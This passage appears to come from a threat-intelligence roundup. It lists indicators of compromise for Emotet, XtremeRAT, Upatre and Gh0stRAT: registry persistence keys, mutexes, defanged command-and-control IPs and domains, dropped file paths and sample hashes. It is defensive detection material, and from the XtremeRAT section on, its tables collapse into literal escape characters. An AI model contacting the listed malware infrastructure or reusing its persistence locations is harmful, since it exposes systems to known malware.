b46d3a615cc5d6f7ebd553c36edb963aacca5f98a271a1b91411b0b2254d4c64
c33f9cdc0fb36fd7147c15adcd46ab375138f87defedee87600270530380fbbb
c4b21c6b8d558fab52a7035e290050132a3011bca864357bfdca398e61ae0ee8
ca9bec90dc6c5084d486e1b19870a9faf0d8f2571802abd08d8156a99eb1d249
cfc11408c01c5fd5eea0f19fca3a6e761d12f2173b6b3c1fd992bb7127e407a8
d1bb9db8ba25c30346a47d50956f71de7015488d8a86630bd18740df485d46fd
e3baec6c7f8bc621d76b4d928e7fe3738b9703d7886a1e5ed7968700c3907ce6
ea5c81219c7ff4e8a9fce2aaf6e553a1aa5fdfb59a19d427acd66d08e82306e2
edcfb40ef3fbe25d5ea5e7606933277b35924205c67fc8898065ad9ca26354a1
f6e98bf8216f833b1dd152150e7155c0c639d6a0323d8f7d738bd27673f5ce1b
fa32101dcf6a77b32d23cc08ccdff496442b983e4233bed1f4e7d6ad0a4d8f8c
fc13c2128949b11b45166489ff26970989d4dc12a456f22cbad00847c069a4a0
```

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP | ✓
Cloudlock | N/A
CWS | ✓
Email Security | ✓
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | ✓
Umbrella | N/A
WSA | N/A

#### Screenshots of Detection

AMP: [detection screenshot](<https://1.bp.blogspot.com/--z03_ujWRq4/XYTvfYdmahI/AAAAAAAACpc/9SlCE3Y7uKUUAOCj4w3d90NB02qf3v1hACLcBGAsYHQ/s1600/edcfb40ef3fbe25d5ea5e7606933277b35924205c67fc8898065ad9ca26354a1_amp.png>)

ThreatGrid: [detection screenshot](<https://1.bp.blogspot.com/-JixcRsaNmps/XYTvjdYOBZI/AAAAAAAACpg/5U2cfc-sLF4IMY_-PgWhh5kYTPPRdub4ACLcBGAsYHQ/s1600/edcfb40ef3fbe25d5ea5e7606933277b35924205c67fc8898065ad9ca26354a1_tg.png>)

* * *

### Win.Malware.Emotet-7171351-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS` Value Name: `ProxyEnable` | 18
`<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS` Value Name: `ProxyServer` | 18
`<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS` Value Name: `ProxyOverride` | 18
`<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS` Value Name: `AutoConfigURL` | 18
`<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS` Value Name: `AutoDetect` | 18
`<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A}` Value Name: `WpadDecisionReason` | 18
`<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A}` Value Name: `WpadDecision` | 18
`<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A}` Value Name: `WpadNetworkName` | 18
`<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A}` Value Name: `WpadDetectedUrl` | 18
`<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT` Value Name: `CachePrefix` | 18
`<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES` Value Name: `CachePrefix` | 18
`<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY` Value Name: `CachePrefix` | 18
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED` Value Name: `Type` | 18
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED` Value Name: `Start` | 18
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED` Value Name: `ErrorControl` | 18
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED` Value Name: `ImagePath` | 18
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED` Value Name: `DisplayName` | 18
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED` Value Name: `WOW64` | 18
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED` Value Name: `ObjectName` | 18
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED` | 18
`<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\84-62-7E-AD-21-80` Value Name: `WpadDecisionReason` | 1
`<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\84-62-7E-AD-21-80` Value Name: `WpadDecision` | 1
`<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\84-62-7E-AD-21-80` Value Name: `WpadDetectedUrl` | 1
`<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\96-2B-A6-19-07-4C` Value Name: `WpadDecisionReason` | 1
`<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\96-2B-A6-19-07-4C` Value Name: `WpadDecision` | 1

Mutexes | Occurrences
---|---
`Global\I98B68E3C` | 18
`Global\M98B68E3C` | 18
`PEM19C` | 18
`\BaseNamedObjects\PEM570` | 18
`PEM748` | 17
`\BaseNamedObjects\Global\M3C28B0E4` | 14
`\BaseNamedObjects\PEM298` | 14
`\BaseNamedObjects\Global\I3C28B0E4` | 14
`PEM4A0` | 10

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`104[.]236[.]185[.]25` | 18
`82[.]78[.]228[.]57` | 18
`187[.]207[.]188[.]248` | 18
`211[.]229[.]116[.]97` | 18
`190[.]146[.]86[.]180` | 4
`190[.]117[.]206[.]153` | 4
`186[.]3[.]188[.]74` | 1
`190[.]146[.]214[.]85` | 1
`190[.]15[.]198[.]47` | 1
`187[.]188[.]166[.]192` | 1
`88[.]215[.]2[.]29` | 1

Files and or directories created | Occurrences
---|---
`%System32%\Microsoft\Protect\S-1-5-18\User\Preferred` | 18
`%ProgramData%\Microsoft\Crypto\RSA\S-1-5-18\6d14e4b1d8ca773bab785d1be032546e_d19ab989-a35f-4710-83df-7b2db7efe7c5` | 18
`%SystemRoot%\SysWOW64\<random, matching '[a-zA-Z0-9]{4,19}'>.exe` | 18
`%System32%\Microsoft\Protect\S-1-5-18\User\a07db9f3-b1b9-4044-8e88-f6c8d68fdc7a` | 1
`%System32%\Microsoft\Protect\S-1-5-18\User\f3586ead-3071-4253-8613-c59bb06aee08` | 1
`%System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-aa11-7d33abe498b7` | 1
`%System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-8a10-4233abe498b7` | 1
`%System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-9a1c-4d33abe498b7` | 1
`%System32%\Microsoft\Protect\S-1-5-18\User\f3586ead-3071-4253-b610-299ab06aee08` | 1
`%System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-8a12-7333abe498b7` | 1
`%System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-9a13-7333abe498b7` | 1
`%System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-9a13-4d33abe498b7` | 1
`%System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-8a10-f332abe498b7` | 1
`%System32%\Microsoft\Protect\S-1-5-18\User\a07db9f3-b1b9-4044-8e87-cac8d68fdc7a` | 1
`%System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-8a1c-f332abe498b7` | 1
`%System32%\Microsoft\Protect\S-1-5-18\User\f3586ead-3071-4253-961f-f89bb06aee08` | 1
`%System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-aa1f-7833abe498b7` | 1
`%System32%\Microsoft\Protect\S-1-5-18\User\a07db9f3-b1b9-4044-8e89-c6c8d68fdc7a` | 1
`%System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-ba10-4133abe498b7` | 1

#### File Hashes

```
5c5acd7e82fb19bfa8a9759c1fc51e93acffb579661fc9b4455fa2f87fd05089
77cbf599e26ac6f094a75c9f3c5d15e4b53bcf9415ddecaa6d91854f16c3b19d
b681565893796b7147bdeeabae464bf847ac52118ba86752f9b4e31497f7d088
c24216d6f195da529874a5db11c969abeadf873379c79a92759ad7378811b2e5
c379f58194bd325c7a5c95dd0d764f10781f4380586853bfe11a5ceb1d3e5aeb
cc848b89bb84b0c6ae96d7191c415dcacf542aed4b2a610a0cf6b77047d7b3ef
d626aacbbd26f0c7d5baee7fd6e49ee8ae2aed7c6352d39ac25134e9985400c6
d8199db09a16c0f851cb3dde4fc06183d23650295836d1a24c4d868af5acc7e3
d86584f92b6af0bfde4a4720878d5ad64f6d8c295b61f5cc345b2fcfa952758e
de3841cd0ab0001fdfd28a4f3fd15d5d20c09629f7857642083e95fa9b716364
e4edfd2654acbab633fbd862641abd852cf3568614b7596373c6c4951e063998
ee21917b1596852818813250aa9a5ee37e87f7ca43120e17f09f940d058c1557
f2dcd182c3a281ee4b0026f6267fb1fafd27ae3f656941464363e4d1c0d68a28
f60672c54ec0ba38a7c7200f75859b811e1c589f84c693a82125350f89d15c94
f75984cfa2bb3c33629e71565da34a8af4b087acf91a19b1dca7481d7adff22b
fcb2b44ce9f1646c1f33a82ed4afa47874166ca0c3842773d1e64fbe603de847
fce9a64d721296eaacbc034526c0719e5628575b25456436664d69cfc4155485
fe7983bcbdb91a3cfa96e68bc57ae13007041e7f048f92372a6488da79c93af7
```

#### Coverage

Product | Protection
---|---
AMP | ✓
Cloudlock | N/A
CWS | ✓
Email Security | ✓
Network Security | ✓
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | ✓
Umbrella | N/A
WSA | ✓

#### Screenshots of Detection

AMP: [detection screenshot](<https://1.bp.blogspot.com/-lYKKKXq8ibo/XYTwEyE6dDI/AAAAAAAACps/nHogjt-idtoSahFPfMXF7mVNjorhRpi9QCLcBGAsYHQ/s1600/b681565893796b7147bdeeabae464bf847ac52118ba86752f9b4e31497f7d088_amp.png>)

ThreatGrid: [detection screenshot](<https://1.bp.blogspot.com/-EGkFh1UJc7U/XYTwJO65uxI/AAAAAAAACpw/jW9dq9z3ajMGvYznKgqO64yeS1r9IZBBwCLcBGAsYHQ/s1600/b681565893796b7147bdeeabae464bf847ac52118ba86752f9b4e31497f7d088_tg.png>)

* * *

### Win.Trojan.XtremeRAT-7170522-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` Value Name: `HKLM` | 15
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` Value Name: `HKCU` | 15
`<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'>` Value Name: `InstalledServer` | 14
`<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'>` | 14
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5S3M304I-21OR-7PJ2-WFYP-365WFB8ILY13}` | 6
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5S3M304I-21OR-7PJ2-WFYP-365WFB8ILY13}` Value Name: `StubPath` | 6
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{766867P2-2ICN-NQ0P-3VWT-3XW6E42YHP48}` Value Name: `StubPath` | 5
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{766867P2-2ICN-NQ0P-3VWT-3XW6E42YHP48}` | 5
`<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'>` Value Name: `ServerStarted` | 5
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5460C4DF-B266-909E-CB58-E32B79832EB2}` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{K66YL0K3-XDEE-5AWY-0K06-EI7W1R701BL3}` Value Name: `StubPath` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{K66YL0K3-XDEE-5AWY-0K06-EI7W1R701BL3}` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{V1V7S53C-K2F0-6KCB-18UG-1IS4RLL44I6B}` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{V1V7S53C-K2F0-6KCB-18UG-1IS4RLL44I6B}` Value Name: 
StubPath ` | 1 \n`<HKCU>\\SOFTWARE\\ASDAF2DS3F ` | 1 \n`<HKCU>\\SOFTWARE\\ASDAF2DS3F \nValue Name: ServerStarted ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{5460C4DF-B266-909E-CB58-E32B79832EB2} \nValue Name: StubPath ` | 1 \n`<HKCU>\\SOFTWARE\\ASDAF2DS3F \nValue Name: InstalledServer ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{6U3FL100-6U8B-5472-CPGO-7O4P7G8N8UO7} \nValue Name: StubPath ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{6U3FL100-6U8B-5472-CPGO-7O4P7G8N8UO7} ` | 1 \nMutexes | Occurrences \n---|--- \n`XTREMEUPDATE` | 15 \n`2H8xgwYEXIT` | 9 \n`1nGM3R2HW` | 6 \n`1nGM3R2HWPERSIST` | 6 \n`\\BaseNamedObjects\\SHuJ5a0JNEXIT` | 5 \n`\\BaseNamedObjects\\SHuJ5a0JNPERSIST` | 5 \n`\\BaseNamedObjects\\SHuJ5a0JN` | 5 \n`2H8xgwYPERSIST` | 3 \n`2H8xgwY` | 3 \n`asdaf2ds3f` | 1 \n`asdaf2ds3fPERSIST` | 1 \n`asdaf2ds3fEXIT` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`192[.]169[.]69[.]25` | 11 \n`186[.]80[.]214[.]75` | 1 \n`181[.]136[.]96[.]20` | 1 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`lili3030[.]duckdns[.]org` | 6 \n`thork13[.]duckdns[.]org` | 4 \n`explocion[.]ddns[.]net` | 1 \n`toyota[.]duckdns[.]org` | 1 \n`master254781[.]ddns[.]net` | 1 \n`TAVO11[.]DDNS[.]NET` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\iJune22.exe` | 15 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\iJune22.lnk` | 15 \n`\\~WELK\\TLO.dll` | 10 \n`\\~WELK` | 10 \n`%HOMEPATH%\\Start Menu\\Programs\\Startup\\iJune22.lnk` | 8 \n`%APPDATA%\\Microsoft\\Windows\\1nGM3R2HW.dat` | 6 \n`%APPDATA%\\Microsoft\\Windows\\1nGM3R2HW.cfg` | 6 \n`%SystemRoot%\\Hewlett` | 6 \n`%SystemRoot%\\Hewlett\\world.exe` | 6 \n`%APPDATA%\\Microsoft\\Windows\\SHuJ5a0JN.cfg` | 5 \n`%APPDATA%\\Microsoft\\Windows\\SHuJ5a0JN.dat` | 5 \n`%SystemRoot%\\chrome\\google.exe` | 5 \n`\\~GGFD` | 5 \n`\\~GGFD\\VDF.dll` | 5 \n`%SystemRoot%\\chrome` | 5 \n`%TEMP%\\x.html` | 4 \n`%SystemRoot%\\InstallDir` | 3 \n`%APPDATA%\\Microsoft\\Windows\\<random, matching '[a-zA-Z0-9]{5,9}'>.dat` | 3 \n`%APPDATA%\\Microsoft\\Windows\\<random, matching '[a-zA-Z0-9]{5,9}'>.cfg` | 3 \n`%SystemRoot%\\InstallDir\\Server.exe` | 2 \n`%APPDATA%\\Microsoft\\Windows\\SHuJ5a0JN.xtr` | 1 \n`%SystemRoot%\\SysWOW64\\System32` | 1 \n`%SystemRoot%\\SysWOW64\\System32\\DELL1.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\asdaf2ds3f.dat` | 1 \n`%APPDATA%\\Microsoft\\Windows\\asdaf2ds3f.cfg` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 21580ad6d39d4f863d8022706812586ef748d179974f3de5b3bae954192ac085 3885550e90bdbf469e3de0ed314b0bae355e5b531e63ebc2766100899de7e4f6 5364296fb8c7f23a30f12abaafdab87659050ae699d8eea17eca90b148959d21 593c32f771db8970231f0543e4b58bc978bbba4e2e6a0285303017040217c250 66a92f7dc4f6ad067ea257be7ceea59e89e5e5b7fccfe1808bb97db7e07741b4 6ff17284e9016804b80fe69d1f6efede80c398ac29986659fb11f5cc313b784c 7408cda78e127d3d8a7ba8b94b3b062a4a2e0e144fd15422c194dba4a2588ec2 
7bf298822f352c0324495373ab984eaecb12f72277988c146496ce19e7e787ba 88fbd4fe4e2aa94375a7cd18305ef0f57722a5e83a468122e847711ebef1b4f1 a75930eb9955724aac62046b3fdff1d4b0c9ce834279915e18b44e2d290e7bde a90db1ec3e45cc03acbb2ee990ff8bd3815cb1c1ccb1ebb6ade227d4493a1d10 b3d349857cf2aa51d4781e02c414f8f34de52cd123b692b49303aaf1e9488822 dfb4eb5f09a31230bdfe457b3fd427b591b6700b62d0036a1d2380db9f464a92 ec1a87dde0b88b9a390439a57830e13063292378abc5c7c21c4fcd3e8054df28 f9cac38fde30e5c07840ec2fe6ca351d2e5f4da5fe4c8ddebd5bab3a51b83902 ff3902531d9310ea6c38cab19b575a88bcd44d9083430789f4cba4c79979193d `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/--bDL4K8gWZ4/XYTwltfYMJI/AAAAAAAACp8/iSLByC-Fd9AeM5Y90j-xEDJxh_mHD34twCLcBGAsYHQ/s1600/6ff17284e9016804b80fe69d1f6efede80c398ac29986659fb11f5cc313b784c_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-mOREF38LDNA/XYTws61lpLI/AAAAAAAACqA/JYBaZF2owDo8I_hwzQiLPu1iva0yxS6bQCLcBGAsYHQ/s1600/6ff17284e9016804b80fe69d1f6efede80c398ac29986659fb11f5cc313b784c_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-Y2cn4J8uhBY/XYTwzF0_83I/AAAAAAAACqE/D3ZtQ6E7CgsGD88tsugTTSdamg4zqx4vQCLcBGAsYHQ/s1600/3885550e90bdbf469e3de0ed314b0bae355e5b531e63ebc2766100899de7e4f6_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Downloader.Upatre-7170342-1\n\n#### Indicators of Compromise\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`104[.]18[.]62[.]192` | 19 \n`104[.]18[.]63[.]192` | 9 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`mmile[.]com` | 28 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\hfdfjdk.exe` | 28 \n`%TEMP%\\ckjienn.exe` | 28 \n`%TEMP%\\file.pe32` | 6 \n`%HOMEPATH%\\Downloads\\invoice.exe` | 4 \n \n#### File Hashes\n\n` 053be505a2b2522fad8b7cb71f5bd04968cfb3ad5e77ad50eac80c71b9ad646d 06de4bdfc758de6336022f8301d692dcc17acbfc9663b367df86a02d528f2b90 09af6f559bcb42c006c0efc09f52dd592f459786c39780679d9d779998b6ecfd 0d2d5ff847cb20067e4213d78dcdf7aaa1c62546dcb00137b087d81703abddcc 21cc6498a5a9cecd5d0c3e94bddd4b182b8db1109268f7be061205fbdb91dfaf 2c1376de5d487cb0ea7be8b0f2710e3b205402bb78f20107a89711f8772120ac 3680339a0a4a8c411134b56dd25beb82b86e49e344d569beadd731d4e76d9cb5 3b24eaa42329d6abf6ce19c41738062797a2515122254b527fd5aec792723db6 3d16bedb9905e2ea113ccf8867502bb1b24d712234ef5a54257b8b3206e27479 43537dfd0609351d2e8d2e858aace8b0fb9ba89d301017a233fbd407f2ad39bd 455bf07f30cce22c8e45801258ea6ca480daed4537f50b2260bb372e784d6eaa 5458977721ca062b9d061190c01da20afc30e616b8264a9e88ef394039c476ed 5d4531531c698fa163199ee68a34661a212b69a93f43eff6d510e85f8663755c 6687eac3a15cb4e0e070ea5a72888644bfe05093e1e30a49b4e0a2a5a29d3d63 67b6cef58b9a052e1ae7994c930014a2ab045c3c7d856896747ceb3bff454c10 6fe8a7c6f231c9c8508879c983583810ea137d022b2d5b17b0213609f8a2f3e0 74f31384ed882520d99460a4583074e2269d3546f30fd08500a671e47f71519b 84e3298502bfa5ddfddc71f014eef7796ad4d1e11b5e40c52a65d3ac04771197 867bb45649adc9f5952e8944c0a4a2f256ed0875f52bd431212f5ade82d240f3 95ab1ac088f7be7dd71ecb6ea5c5923f4adbb05bd9480623ec788d6688ebae71 95cb3bbabe9d01355f0363f341b1a8d0d56b485e2b62c1111a0f68839c7d9c2e a0a861ff5549335dc76f9fd837e20073e23a2298b7e025615dfdbf0e00b0a91d a551656a575421e4cb87a7598846ab9436fb0bc7d9c7869edc8a4ca5d65ec105 b1aa0afb11da754c88e496a081982394a1ff8e6be6de0e54a11e27681095f8b1 beb20991985d1f3ea8654fdfb1e45824eed71a0abdff34ee1e3963a140a606ed `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- 
\nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-uu2HCdCO4M0/XYTxEgozvZI/AAAAAAAACqQ/ioAvNaMPKScjOEvLvVVR0rnCiiXmue82gCLcBGAsYHQ/s1600/5458977721ca062b9d061190c01da20afc30e616b8264a9e88ef394039c476ed_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-IIqGLLoGoGw/XYTxJgNaktI/AAAAAAAACqU/PwQ4Q9FagDYJgxktXedgf1HwF_Oymxm-gCLcBGAsYHQ/s1600/5458977721ca062b9d061190c01da20afc30e616b8264a9e88ef394039c476ed_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.Gh0stRAT-7170222-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Update_win ` | 29 \nMutexes | Occurrences \n---|--- \n`sanshuigood.vicp.cc` | 3 \n`222.186.56.11` | 3 \n`rj.17caobi.com` | 2 \n`23.238.196.11` | 2 \n`222.186.34.200` | 1 \n`\\BaseNamedObjects\\103.249.28.41` | 1 \n`\\BaseNamedObjects\\174.139.211.14` | 1 \n`\\BaseNamedObjects\\174.139.208.54` | 1 \n`59.13.211.161` | 1 \n`67.229.57.228` | 1 \n`27.255.80.206` | 1 \n`220.70.90.33` | 1 \n`rj.dxjav.com` | 1 \n`117.52.14.152` | 1 \n`67.198.139.206` | 1 \n`67.229.224.82` | 1 \n`121.78.158.39` | 1 \n`loloyasumi.com` | 1 \n`100.43.130.130` | 1 \n`98.126.240.114` | 1 \n`184.83.6.205` | 1 \n`174.139.208.51` | 1 \n`183.86.218.138` | 1 \nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`61[.]142[.]176[.]23` | 3 \n`222[.]186[.]56[.]11` | 3 \n`23[.]238[.]196[.]11` | 2 \n`216[.]218[.]206[.]69` | 1 \n`222[.]186[.]34[.]200` | 1 \n`103[.]249[.]28[.]41` | 1 \n`174[.]139[.]211[.]14` | 1 \n`174[.]139[.]208[.]54` | 1 \n`59[.]13[.]211[.]161` | 1 \n`67[.]229[.]57[.]228` | 1 \n`27[.]255[.]80[.]206` | 1 \n`220[.]70[.]90[.]33` | 1 \n`117[.]52[.]14[.]152` | 1 \n`67[.]198[.]139[.]206` | 1 \n`67[.]229[.]224[.]82` | 1 \n`121[.]78[.]158[.]39` | 1 \n`100[.]43[.]130[.]130` | 1 \n`98[.]126[.]240[.]114` | 1 \n`184[.]83[.]6[.]205` | 1 \n`174[.]139[.]208[.]51` | 1 \n`183[.]86[.]218[.]138` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`sanshuigood[.]vicp[.]cc` | 3 \n`rj[.]17caobi[.]com` | 2 \n`rj[.]dxjav[.]com` | 1 \n`loloyasumi[.]com` | 1 \n \n#### File Hashes\n\n` 0235f44dcc192d4a9388c9a209a8e28197be43afe382cd089b2445f15c4bfc7b 03e1d03b7ecc4dc2a4f781b83fb1d0677e885b995b96da937789ba594dfa6ba6 098522455fe96579b43408f37111f6064e2b564ff69e94f9808e01722e868c00 0b4a4f248629b27f3929e4a11186c35448c86921bd913dd5847a2c60ce430985 0f165051f607a0f289a8d9af17dec51cc9074134b70a766ae98293d08c8ae230 10609c1a910e9e71107cde6a3dc6f6ebcda7c2cb2a5775fe4e0217953f87c690 1d7dfe543d4ca35cfb162bf01e452c31240db8caa4452bb0fe5d382e730817d4 24bd88c9de5d9d09dc42a6b7338deb060c8444c1b57918a32d43739fa255247b 24fda94cdc7eb56af6fb5e6c39a85d9f80a1d622c4e3e5627bf30445b6b3a603 28bfbe60ce5013709c6e66d2aa96391dd260bdc3d6d7aa4dcd947ac79351a9e0 28c1255d7261e13d6a0f380267d43e190b1c54da127667591cda45844266265e 33d1367a9864cd8704db52626a5ff24d84ac74efd1414c371516b49a2bf73cb3 382ab955b1af78fba82e1209e6d61328d3100cb65f13be24615630dddf55af1a 383fed33d04f113938f2c21df9c7387e616ad4b528cb8d4dd6d0f8192ace729d 384583ac629ffbcb7a55da44910dd23cd380ce788bfae201c7ede3189959619f 38857b2a7f68193292de188f5ae07a1dc20cc8d9616a8fcfc8d7e56c9cb1342b 39027866667d05c74a96c42d98cd08b90a8f78dcfd88d3f28265a2dc5f1d1b7c 
3b93d4215f033ae31063f5a790d6a139925a0e3a15f9e5ff32bf85b852eebcca 3c7c883d9cbfe7f0dc2a600e845becde9bf87898651ae475654fd79d37df5589 4bb16a15be32eb06a514619e851cca7a89b0e990c678192cd0a6329ac04dab5d 4c30fef1e3bb90050f8c874b92857e223179214a3c2e566da2c44dbf8b500d90 4c322440da73cf7b1152f3d62729cb4d8c2d8cefe8403743ca53283c33955689 51557a7629fe983488ac73c79717b97223c0babd9319916c3fbd575400eb09f0 51ae9265a88cf455a3143c022eea1e41038d3617f964ebf3f58310a9dfbacc33 68a9bf919b38f938938062e22852a3adebcca10973db9eb8172ee0e40e80fa34 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-XB808TFUCo4/XYTxdGHunmI/AAAAAAAACqg/bFZODEhFp28n93OJEN0uIowt6p8UjvArgCLcBGAsYHQ/s1600/3c7c883d9cbfe7f0dc2a600e845becde9bf87898651ae475654fd79d37df5589_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-0peo5b84HgU/XYTyCZLWY-I/AAAAAAAACqs/lZfErrKvPm87JyCvaLSgU-Jd1tZ8LmdxgCLcBGAsYHQ/s1600/03e1d03b7ecc4dc2a4f781b83fb1d0677e885b995b96da937789ba594dfa6ba6_tg.png>)\n\n \n\n\n#### 